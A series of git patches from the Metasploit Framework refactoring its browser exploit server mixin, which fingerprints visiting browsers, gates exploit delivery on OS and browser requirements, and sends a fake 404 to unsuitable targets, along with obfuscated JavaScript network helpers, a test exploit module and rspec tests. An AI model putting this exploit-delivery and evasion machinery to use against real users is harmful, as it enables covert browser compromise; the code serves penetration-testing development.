From 5fb261a9746f815b2d32f95b6b993c96d751b2db Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 23:48:41 -0500
Subject: [PATCH 13/73] Change var name

---
 lib/msf/core/exploit/browser/server.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index d98044698f..fa498716d5 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -293,15 +293,15 @@ module Msf
         # on_request_exploit() to get the target information
         #
         tag = retreive_tag(request)
-        target_profile = get_profile(tag)
-        if target_profile[tag][:tried] and datastore['Retries'] == false
+        profile = get_profile(tag)
+        if profile[tag][:tried] and datastore['Retries'] == false
           print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
           send_not_found(cli)
         else
-          update_profile(target_profile, :tried, true)
-          bad_reqs = has_bad_requirements?(target_profile)
+          update_profile(profile, :tried, true)
+          bad_reqs = has_bad_requirements?(profile)
           if bad_reqs.empty?
-            method(:on_request_exploit).call(cli, request, target_profile)
+            method(:on_request_exploit).call(cli, request, profile)
           else
             print_error("Exploit requirement(s) not met: #{bad_reqs * ', '}")
             send_not_found(cli)

From abc06aa8aa86b44051dfb9e89326f1970b9e1430 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 1 Nov 2013 11:35:23 -0500
Subject: [PATCH 14/73] Use mutex

---
 lib/msf/core/exploit/browser/server.rb | 20 ++++++++++++++++----
 1 file changed, 16 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index fa498716d5..331b672828 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -61,6 +61,12 @@ module Msf
       ], Exploit::Remote::BrowserExploitServer)
     end
 
+    #
+    # Syncs a block of code
+    #
+    def sync(&block)
+      (@mutex ||= Mutex.new).synchronize(&block)
+    end
 
     #
     # Returns the resource (URI) to the module
@@ -101,8 +107,10 @@ module Msf
     # Returns the target profile based on the tag
     #
     def get_profile(tag)
-      @target_profiles.each do |profile|
-        return profile if profile[tag]
+      sync do
+        @target_profiles.each do |profile|
+          return profile if profile[tag]
+        end
       end
 
       nil
@@ -112,14 +120,18 @@ module Msf
     # Updates information for a specific profile
     #
     def update_profile(target_profile, key, value)
-      target_profile[target_profile.first[0]][key] = value
+      sync do
+        target_profile[target_profile.first[0]][key] = value
+      end
     end
 
     #
     # Initializes a profile
     #
     def init_profile(tag)
-      @target_profiles << {tag => {}}
+      sync do
+        @target_profiles << {tag => {}}
+      end
     end
 
     #

From a806b1aa5e81b3bd0fbb833dde5a10c9bc9e422c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 1 Nov 2013 12:11:49 -0500
Subject: [PATCH 15/73] Update test example

---
 .../exploits/test/browserexploitserver.rb     | 28 +++++++++++--------
 1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index 799ab29e23..f85cdea45f 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -16,7 +16,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
         Here's an example of building an exploit using the BrowserExploitServer.
         This example requires the target to be exploit. If not, the mixin will
-        send a fake 404 as a way to avoid engaging the target.
+        send a fake 404 as a way to avoid engaging the target. The example is
+        for Windows only.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'sinn3r' ],
@@ -40,30 +41,33 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # You can see what you can see by doing this in on_request_exploit():
     # print_debug(target_info.inspect)
+    # This example is for windows only
     requirements({
       :source  => /script|headers/i,
       :os_name => /win/i
     })
   end
 
-  def exploit_template
-    # "user_profile" is a hash that stores the following information:
-    # - :ip        ; IP addressed used to connnect to the exploit
-    # - :useragent ; User-Agent
-    # - :plugins   ; All the plugins the browser runs
-    # - :cookie    ; A unique value assigned to the user as a way to tag them.
-    #profile = user_profile
-
+  def exploit_template(target_info)
+    tag = target_info.first[0]
     %Q|
     <% msg = "This page is generated by an exploit" %>
     <%=msg%>
+    <p></p>
+    You are tagged as: #{tag}<br>
+    Data gathered from source: #{target_info[tag][:source]}<br>
+    OS name: #{target_info[tag][:os_name]}<br>
+    Flavor: #{target_info[tag][:os_flavor]}<br>
+    UA name: #{target_info[tag][:ua_name]}<br>
+    UA version: #{target_info[tag][:ua_ver]}
     |
   end
 
   def on_request_exploit(cli, request, target_info)
-    print_debug("I got this user: #{target_info.inspect}")
+    p = get_payload(cli, target_info)
+    vprint_line(Rex::Text.to_hex_dump(p))
     print_status("Sending exploit HTML...")
-    send_exploit_html(cli, exploit_template)
+    send_exploit_html(cli, exploit_template(target_info))
   end
 
 
@@ -75,6 +79,8 @@ end
 
 =begin
 
+Example of raw target_info:
+
 {"rMWwSAwBHLoESpHbEGbsv"=>{:source=>"script", :os_name=>"Microsoft Windows", :os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0", :arch=>"x86", :office=>"null", :proxy=>false, :language=>"en-us", :tried=>true}}
 
 =end
\ No newline at end of file

From 094abdd093cdd0bd45acc4dab6c8bd9e56a5b433 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 1 Nov 2013 14:59:21 -0500
Subject: [PATCH 16/73] rspec this

---
 .../msf/core/exploit/browser/server_spec.rb   | 133 ++++++++++++++++++
 1 file changed, 133 insertions(+)
 create mode 100644 spec/lib/msf/core/exploit/browser/server_spec.rb

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
new file mode 100644
index 0000000000..4072572ecf
--- /dev/null
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -0,0 +1,133 @@
+require 'spec_helper'
+require 'msf/core'
+require 'msf/core/exploit/browser/server'
+
+describe Msf::Exploit::Remote::BrowserExploitServer do
+
+  subject(:server) do
+    mod = Msf::Exploit.allocate
+    mod.extend described_class
+    mod.send(:initialize, {})
+    mod
+  end
+
+  let(:mock_service) do
+    mock_service = double("service")
+    mock_service.stub(:server_name=)
+    mock_service.stub(:add_resource)
+
+    mock_service
+  end
+
+  before do
+    Rex::ServiceManager.stub(:start => mock_service)
+  end
+
+  describe ".get_module_resource" do
+    it "should give me a URI to access the exploit page" do
+      server.start_service
+      ivar_exploit_page = server.instance_variable_get(:@exploit_receiver_page)
+      module_resource = server.get_module_resource
+      module_resource.should match(ivar_exploit_page)
+    end
+  end
+
+  describe ".requirements" do
+    it "should begin with an empty hash by default" do
+      server.start_service
+      ivar_requirements = server.instance_variable_get(:@requirements)
+      ivar_requirements.should eq({})
+    end
+
+    it "should have some requirements" do
+      opts = {
+        :source  => /script|headers/i,
+        :os_name => /win/i
+      }
+
+      server.start_service
+      server.requirements(opts)
+      ivar_requirements = server.instance_variable_get(:@requirements)
+      ivar_requirements.should eq(opts)
+    end
+  end
+
+  describe ".has_bad_requirements?" do
+    it "should not contain any bad requirements" do
+      fake_profile = {
+        "rMWwSAwBHLoESpHbEGbsv" => {
+          :source    => "script",
+          :os_name   => "Microsoft Windows",
+          :os_flavor => "XP",
+          :ua_name   => "MSIE",
+          :ua_ver    => "8.0",
+          :arch      => "x86",
+          :office    => "null",
+          :proxy     => false,
+          :language  => "en-us",
+          :tried     => true
+        }}
+
+        server.start_service
+        server.has_bad_requirements?(fake_profile).should eq([])
+    end
+
+    it "should have identify :os_name as a requirement not met" do
+      fake_profile = {
+        "rMWwSAwBHLoESpHbEGbsv" => {
+          :os_name   => "Linux"
+        }}
+
+      server.start_service
+      server.requirements({:os_name=>/win/i})
+      baddies = server.has_bad_requirements?(fake_profile)
+      baddies.should eq([:os_name])
+    end
+  end
+
+  describe ".init_profile" do
+    it "should initialize an empety profile for tag 'random'" do
+      server.start_service
+      server.init_profile("random")
+      ivar_target_profile = server.instance_variable_get(:@target_profiles).first
+      ivar_target_profile['random'].should eq({})
+    end
+  end
+
+  describe ".get_profile" do
+    it "should return nil when a profile isn't found" do
+      server.start_service
+      server.init_profile("random")
+      p = server.get_profile("sinn3r")
+      p.should eq(nil)
+    end
+
+    it "should return a profile if found" do
+      server.start_service
+      server.init_profile("random")
+      p = server.get_profile("random")
+      p['random'].should_not eq(nil)
+    end
+  end
+
+  describe ".update_profile" do
+    it "should update my target profile's :os_name information" do
+      server.start_service
+      server.init_profile("random")
+      profile = server.get_profile("random")
+      server.update_profile(profile, :os_name, 'Linux')
+      profile = server.get_profile("random")
+      os_name = profile['random'][:os_name]
+      os_name.should eq('Linux')
+    end
+  end
+
+  describe ".get_detection_html" do
+    it "should return the detection code that the client will get" do
+      server.start_service
+      html = server.get_detection_html
+      html.should_not eq('')
+    end
+  end
+
+end
\ No newline at end of file

From c7c1fcfa9860774c8850495d9bd09bbad9733369 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 2 Nov 2013 14:52:50 -0500
Subject: [PATCH 17/73] Pull shared XHR shim out, add option to static Js
 module method.

* Moves shim to data/js/network/xhr_shim.js
* Add some yardoc comments
---
 data/js/network/ajax_download.js   | 14 +-----
 data/js/network/ajax_post.js       | 15 +------
 data/js/network/xhr_shim.js        | 13 ++++++
 lib/rex/exploitation/js/network.rb | 69 ++++++++++++++++++++++++------
 4 files changed, 71 insertions(+), 40 deletions(-)
 create mode 100644 data/js/network/xhr_shim.js

diff --git a/data/js/network/ajax_download.js b/data/js/network/ajax_download.js
index 90329f51d3..7c621a38dd 100644
--- a/data/js/network/ajax_download.js
+++ b/data/js/network/ajax_download.js
@@ -7,19 +7,7 @@ function ajax_download(oArg) {
   if (method == path)      { throw "Missing parameter 'path'"; }
   if (data   == undefined) { data = null; }
 
-  if (window.XMLHttpRequest) {
-    xmlHttp = new XMLHttpRequest();
-  }
-  else {
-    var objs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.4.0"];
-    for (var i=0; i < objs.length; i++) {
-      try {
-        xmlHttp = new ActiveXObject(objs[i]);
-        break;
-      }
-      catch (e) {}
-    }
-  }
+  var xmlHttp = new XMLHttpRequest();
 
   if (xmlHttp.overrideMimeType) {
     xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
diff --git a/data/js/network/ajax_post.js b/data/js/network/ajax_post.js
index 02a70850c7..4e6729acfa 100644
--- a/data/js/network/ajax_post.js
+++ b/data/js/network/ajax_post.js
@@ -1,18 +1,5 @@
 function postInfo(path, data) {
-  var xmlHttp = '';
-  if (window.XMLHttpRequest) {
-    xmlHttp = new XMLHttpRequest();
-  }
-  else {
-    var objs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.4.0"];
-    for (var i=0; i < objs.length; i++) {
-      try {
-        xmlHttp = new ActiveXObject(objs[i]);
-        break;
-      }
-      catch (e) {}
-    }
-  }
+  var xmlHttp = new XMLHttpRequest();
 
   if (xmlHttp.overrideMimeType) {
     xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
diff --git a/data/js/network/xhr_shim.js b/data/js/network/xhr_shim.js
new file mode 100644
index 0000000000..4a056dd31c
--- /dev/null
+++ b/data/js/network/xhr_shim.js
@@ -0,0 +1,13 @@
+if (!window.XMLHTTPRequest) {
+  var i, ids = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+  for (i = 0; i < ids.length; i++) {
+    try {
+      new ActiveXObject(ids[i]);
+      window.XMLHttpRequest = function() {
+        return new ActiveXObject(ids[i]);
+      };
+      break;
+    }
+    catch (e) {}
+  }
+}
diff --git a/lib/rex/exploitation/js/network.rb b/lib/rex/exploitation/js/network.rb
index 65fd3389f9..f0105cc9e1 100644
--- a/lib/rex/exploitation/js/network.rb
+++ b/lib/rex/exploitation/js/network.rb
@@ -11,27 +11,70 @@ module Js
 #
 class Network
 
-  def self.ajax_download
+  # @param [Hash] opts the options hash
+  # @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
+  # @option opts [Boolean] :use_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
+  #   defaults to true.
+  # @return [String] javascript code to perform a synchronous ajax request to the remote
+  #   and returns the response
+  def self.ajax_download(opts={})
+    should_obfuscate = opts.fetch(:obfuscate, true)
     js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_download.js"))
 
-    ::Rex::Exploitation::ObfuscateJS.new(js,
-      {
-        'Symbols' => {
-          'Variables' => %w{ xmlHttp }
-        }
+    if should_obfuscate
+      js = ::Rex::Exploitation::ObfuscateJS.new(js,
+        {
+          'Symbols' => {
+            'Variables' => %w{ xmlHttp }
+          }
       }).obfuscate
+    end
+
+    xhr_shim(opts) + js
   end
 
+  # @param [Hash] opts the options hash
+  # @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
+  # @option opts [Boolean] :use_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
+  #   defaults to true.
+  # @return [String] javascript code to perform a synchronous ajax request to the remote with
+  #   the data specified
+  def self.ajax_post(opts={})
+    should_obfuscate = opts.fetch(:obfuscate, true)
+    js = :File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_post.js"))
 
-  def self.ajax_post
-    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_post.js"))
+    if should_obfuscate
+      ::Rex::Exploitation::ObfuscateJS.new(js,
+        {
+          'Symbols' => {
+            'Variables' => %w{ xmlHttp }
+          }
+        }).obfuscate
+    end
 
-    ::Rex::Exploitation::ObfuscateJS.new(js,
-      {
-        'Symbols' => {
-          'Variables' => %w{ xmlHttp }
+    xhr_shim(opts) + js
+  end
+
+  # @param [Hash] opts the options hash
+  # @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
+  # @option opts [Boolean] :use_xhr_shim false causes this method to return ''. defaults to true.
+  # @return [String] javascript code that adds XMLHttpRequest to the global scope if it
+  #   does not exist (e.g. on IE6, where you have to use the ActiveXObject constructor)
+  def self.xhr_shim(opts={})
+    return '' unless opts.fetch(:use_xhr_shim, true)
+
+    should_obfuscate = opts.fetch(:obfuscate, true)
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "xhr_shim.js"))
+
+    if should_obfuscate
+      ::Rex::Exploitation::ObfuscateJS.new(js,
+        {
+          'Symbols' => {
+            'Variables' => %w{ i objs }
+          }
         }
-      }).obfuscate
+      ).obfuscate
+    end
   end
 
 end

From 90d8da6a21c96c255144f1ac30c5a2b591259a3c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 2 Nov 2013 16:46:33 -0500
Subject: [PATCH 18/73] Fix some bugs in my edits, add a spec.

---
 data/js/network/ajax_download.js             | 14 +++++---------
 data/js/network/xhr_shim.js                  |  8 ++++----
 lib/rex/exploitation/js/network.rb           | 11 ++++++-----
 spec/lib/rex/exploitation/js/network_spec.rb |  8 ++++++++
 4 files changed, 23 insertions(+), 18 deletions(-)

diff --git a/data/js/network/ajax_download.js b/data/js/network/ajax_download.js
index 7c621a38dd..789e58e4a8 100644
--- a/data/js/network/ajax_download.js
+++ b/data/js/network/ajax_download.js
@@ -1,11 +1,7 @@
 function ajax_download(oArg) {
-  var method = oArg.method;
-  var path   = oArg.path;
-  var data   = oArg.data;
-
-  if (method == undefined) { method = "GET"; }
-  if (method == path)      { throw "Missing parameter 'path'"; }
-  if (data   == undefined) { data = null; }
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
 
   var xmlHttp = new XMLHttpRequest();
 
@@ -13,8 +9,8 @@ function ajax_download(oArg) {
     xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
   }
 
-  xmlHttp.open(method, path, false);
-  xmlHttp.send(data);
+  xmlHttp.open(oArg.method, oArg.path, false);
+  xmlHttp.send(oArg.data);
   if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
     return xmlHttp.responseText;
   }
diff --git a/data/js/network/xhr_shim.js b/data/js/network/xhr_shim.js
index 4a056dd31c..f3e0a9e17f 100644
--- a/data/js/network/xhr_shim.js
+++ b/data/js/network/xhr_shim.js
@@ -1,10 +1,10 @@
 if (!window.XMLHTTPRequest) {
-  var i, ids = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
-  for (i = 0; i < ids.length; i++) {
+  var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+  for (idx = 0; idx < activeObjs.length; idx++) {
     try {
-      new ActiveXObject(ids[i]);
+      new ActiveXObject(activeObjs[idx]);
       window.XMLHttpRequest = function() {
-        return new ActiveXObject(ids[i]);
+        return new ActiveXObject(activeObjs[idx]);
       };
       break;
     }
diff --git a/lib/rex/exploitation/js/network.rb b/lib/rex/exploitation/js/network.rb
index f0105cc9e1..91c5350279 100644
--- a/lib/rex/exploitation/js/network.rb
+++ b/lib/rex/exploitation/js/network.rb
@@ -25,7 +25,7 @@ class Network
       js = ::Rex::Exploitation::ObfuscateJS.new(js,
         {
           'Symbols' => {
-            'Variables' => %w{ xmlHttp }
+            'Variables' => %w{ xmlHttp oArg }
           }
       }).obfuscate
     end
@@ -41,10 +41,10 @@ class Network
   #   the data specified
   def self.ajax_post(opts={})
     should_obfuscate = opts.fetch(:obfuscate, true)
-    js = :File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_post.js"))
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_post.js"))
 
     if should_obfuscate
-      ::Rex::Exploitation::ObfuscateJS.new(js,
+      js = ::Rex::Exploitation::ObfuscateJS.new(js,
         {
           'Symbols' => {
             'Variables' => %w{ xmlHttp }
@@ -67,14 +67,15 @@ class Network
     js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "xhr_shim.js"))
 
     if should_obfuscate
-      ::Rex::Exploitation::ObfuscateJS.new(js,
+      js = ::Rex::Exploitation::ObfuscateJS.new(js,
         {
           'Symbols' => {
-            'Variables' => %w{ i objs }
+            'Variables' => %w{ activeObjs idx }
           }
         }
       ).obfuscate
     end
+    js
   end
 
 end
diff --git a/spec/lib/rex/exploitation/js/network_spec.rb b/spec/lib/rex/exploitation/js/network_spec.rb
index 46dadc6d5a..23a7d2ae22 100644
--- a/spec/lib/rex/exploitation/js/network_spec.rb
+++ b/spec/lib/rex/exploitation/js/network_spec.rb
@@ -11,6 +11,14 @@ describe Rex::Exploitation::Js::Network do
       end
     end
 
+    context ".ajax_download" do
+      it "should load the ajax_post javascript" do
+        js = Rex::Exploitation::Js::Network.ajax_download
+        js.should =~ /function ajax_post/
+      end
+
+    end
+
   end
 
 end
\ No newline at end of file

From 5f85ede389d8916a7d61501a74eb03aa25d4c139 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 2 Nov 2013 16:47:50 -0500
Subject: [PATCH 19/73] Prevent xhr shim from leaking.

---
 data/js/network/xhr_shim.js | 22 ++++++++++++----------
 1 file changed, 12 insertions(+), 10 deletions(-)

diff --git a/data/js/network/xhr_shim.js b/data/js/network/xhr_shim.js
index f3e0a9e17f..0cbdec39ef 100644
--- a/data/js/network/xhr_shim.js
+++ b/data/js/network/xhr_shim.js
@@ -1,13 +1,15 @@
 if (!window.XMLHTTPRequest) {
-  var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
-  for (idx = 0; idx < activeObjs.length; idx++) {
-    try {
-      new ActiveXObject(activeObjs[idx]);
-      window.XMLHttpRequest = function() {
-        return new ActiveXObject(activeObjs[idx]);
-      };
-      break;
+  (function() {
+    var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+    for (idx = 0; idx < activeObjs.length; idx++) {
+      try {
+        new ActiveXObject(activeObjs[idx]);
+        window.XMLHttpRequest = function() {
+          return new ActiveXObject(activeObjs[idx]);
+        };
+        break;
+      }
+      catch (e) {}
     }
-    catch (e) {}
-  }
+  })();
 }

From bccbed27578ade8ebaffdd94d9071b3031a7f0ac Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 2 Nov 2013 16:52:04 -0500
Subject: [PATCH 20/73] Rename :use_xhr_shim to :inject_xhr_shim.

---
 lib/rex/exploitation/js/network.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/rex/exploitation/js/network.rb b/lib/rex/exploitation/js/network.rb
index 91c5350279..cb22211a1e 100644
--- a/lib/rex/exploitation/js/network.rb
+++ b/lib/rex/exploitation/js/network.rb
@@ -13,7 +13,7 @@ class Network
 
   # @param [Hash] opts the options hash
   # @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
-  # @option opts [Boolean] :use_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
+  # @option opts [Boolean] :inject_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
   #   defaults to true.
   # @return [String] javascript code to perform a synchronous ajax request to the remote
   #   and returns the response
@@ -35,7 +35,7 @@ class Network
 
   # @param [Hash] opts the options hash
   # @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
-  # @option opts [Boolean] :use_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
+  # @option opts [Boolean] :inject_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
   #   defaults to true.
   # @return [String] javascript code to perform a synchronous ajax request to the remote with
   #   the data specified
@@ -57,11 +57,11 @@ class Network
 
   # @param [Hash] opts the options hash
   # @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
-  # @option opts [Boolean] :use_xhr_shim false causes this method to return ''. defaults to true.
+  # @option opts [Boolean] :inject_xhr_shim false causes this method to return ''. defaults to true.
   # @return [String] javascript code that adds XMLHttpRequest to the global scope if it
   #   does not exist (e.g. on IE6, where you have to use the ActiveXObject constructor)
   def self.xhr_shim(opts={})
-    return '' unless opts.fetch(:use_xhr_shim, true)
+    return '' unless opts.fetch(:inject_xhr_shim, true)
 
     should_obfuscate = opts.fetch(:obfuscate, true)
     js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "xhr_shim.js"))

From 7d975dfa8777a543caea1d889e0da4d28e32dc7c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 2 Nov 2013 16:54:22 -0500
Subject: [PATCH 21/73] Fix spec to refer to postInfo().

---
 spec/lib/rex/exploitation/js/network_spec.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/spec/lib/rex/exploitation/js/network_spec.rb b/spec/lib/rex/exploitation/js/network_spec.rb
index 23a7d2ae22..9f74c6bf43 100644
--- a/spec/lib/rex/exploitation/js/network_spec.rb
+++ b/spec/lib/rex/exploitation/js/network_spec.rb
@@ -11,14 +11,14 @@ describe Rex::Exploitation::Js::Network do
       end
     end
 
-    context ".ajax_download" do
-      it "should load the ajax_post javascript" do
-        js = Rex::Exploitation::Js::Network.ajax_download
-        js.should =~ /function ajax_post/
+    context ".ajax_post" do
+      it "should load the postInfo javascript" do
+        js = Rex::Exploitation::Js::Network.ajax_post
+        js.should =~ /function postInfo/
       end
 
     end
 
   end
 
-end
\ No newline at end of file
+end

From 1d5643d53ce0b465ada3cfbba10d51e6e1f4c026 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 10:37:41 -0600
Subject: [PATCH 22/73] Match Rspec terminology

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 4072572ecf..4a99d37d41 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -11,16 +11,16 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     mod
   end
 
-  let(:mock_service) do
-    mock_service = double("service")
-    mock_service.stub(:server_name=)
-    mock_service.stub(:add_resource)
+  let(:service_double) do
+    service = double("service")
+    service.stub(:server_name=)
+    service.stub(:add_resource)
 
-    mock_service
+    service
   end
 
   before do
-    Rex::ServiceManager.stub(:start => mock_service)
+    Rex::ServiceManager.stub(:start => service_double)
   end
 
   describe ".get_module_resource" do

From 34b5136aa469ec20855b910f4cbe8e8ba8ebec7c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 10:47:52 -0600
Subject: [PATCH 23/73] use let for requirements

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 4a99d37d41..52ad7273cf 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -33,10 +33,13 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
   end
 
   describe ".requirements" do
+    let (:actual_requirements) do
+      server.instance_variable_get(:@requirements)
+    end
+
     it "should begin with an empty hash by default" do
-      server.start_service
-      ivar_requirements = server.instance_variable_get(:@requirements)
-      ivar_requirements.should eq({})
+      server.start_service 
+      actual_requirements.should eq({})
     end
 
     it "should have some requirements" do
@@ -47,8 +50,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
       server.start_service
       server.requirements(opts)
-      ivar_requirements = server.instance_variable_get(:@requirements)
-      ivar_requirements.should eq(opts)
+      actual_requirements.should eq(opts)
     end
   end
 

From 8bfa2524961acbd0a5fbb55ede96178693aff351 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 10:49:48 -0600
Subject: [PATCH 24/73] Restate this test

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 52ad7273cf..1a7685eee2 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -42,7 +42,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       actual_requirements.should eq({})
     end
 
-    it "should have some requirements" do
+    it "should have these requirements: script or headers for source, and windows for OS" do
       opts = {
         :source  => /script|headers/i,
         :os_name => /win/i

From 480b876a1149a7374f58b5be46a9b526c020a1fb Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 10:51:31 -0600
Subject: [PATCH 25/73] non_existent_profile

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 1a7685eee2..6ee4f77c19 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -100,7 +100,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     it "should return nil when a profile isn't found" do
       server.start_service
       server.init_profile("random")
-      p = server.get_profile("sinn3r")
+      p = server.get_profile("non_existent_profile")
       p.should eq(nil)
     end
 

From 6e0690754fb03368210887bd615c02c5f465c239 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 10:54:15 -0600
Subject: [PATCH 26/73] let 'random'

---
 .../msf/core/exploit/browser/server_spec.rb   | 24 +++++++++++--------
 1 file changed, 14 insertions(+), 10 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 6ee4f77c19..de007ff0f8 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -19,6 +19,10 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     service
   end
 
+  let(:random) do
+    "random"
+  end
+
   before do
     Rex::ServiceManager.stub(:start => service_double)
   end
@@ -90,36 +94,36 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
   describe ".init_profile" do
     it "should initialize an empety profile for tag 'random'" do
       server.start_service
-      server.init_profile("random")
+      server.init_profile(random)
       ivar_target_profile = server.instance_variable_get(:@target_profiles).first
-      ivar_target_profile['random'].should eq({})
+      ivar_target_profile[random].should eq({})
     end
   end
 
   describe ".get_profile" do
     it "should return nil when a profile isn't found" do
       server.start_service
-      server.init_profile("random")
+      server.init_profile(random)
       p = server.get_profile("non_existent_profile")
       p.should eq(nil)
     end
 
     it "should return a profile if found" do
       server.start_service
-      server.init_profile("random")
-      p = server.get_profile("random")
-      p['random'].should_not eq(nil)
+      server.init_profile(random)
+      p = server.get_profile(random)
+      p[random].should_not eq(nil)
     end
   end
 
   describe ".update_profile" do
